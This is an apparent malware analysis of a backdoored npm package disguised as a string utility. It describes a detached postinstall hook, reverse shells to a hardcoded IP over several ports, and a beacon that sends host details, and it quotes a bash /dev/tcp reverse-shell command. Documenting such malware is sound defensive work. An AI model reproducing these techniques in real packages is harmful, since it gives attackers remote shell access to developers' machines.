On npm install, the postinstall hook (scripts/postinstall.js) detach-spawns scripts/shell.js with detached: true, stdio: 'ignore', windowsHide: true and unref()s it, so the malicious process persists silently after npm install returns. scripts/shell.js hardcodes HOST = '114.67.90.67' and opens reverse shells to that IP across multiple fallback ports (3334, 4444, 443, 80, 8080, 53) using Node net, bash -c "bash -i >& /dev/tcp/<HOST>/<port> 0>&1", and a Python fallback, then uses setInterval to keep the process alive. It also sends an HTTP GET to http://114.67.90.67:8333/ping with the installer's hostname, username, cwd, and OS platform/release as query parameters, confirming victim acquisition. The package advertises itself as a string-manipulation utility, providing cover for the backdoor. Installing this package gives the operator of 114.67.90.67 interactive shell access on the installer's machine.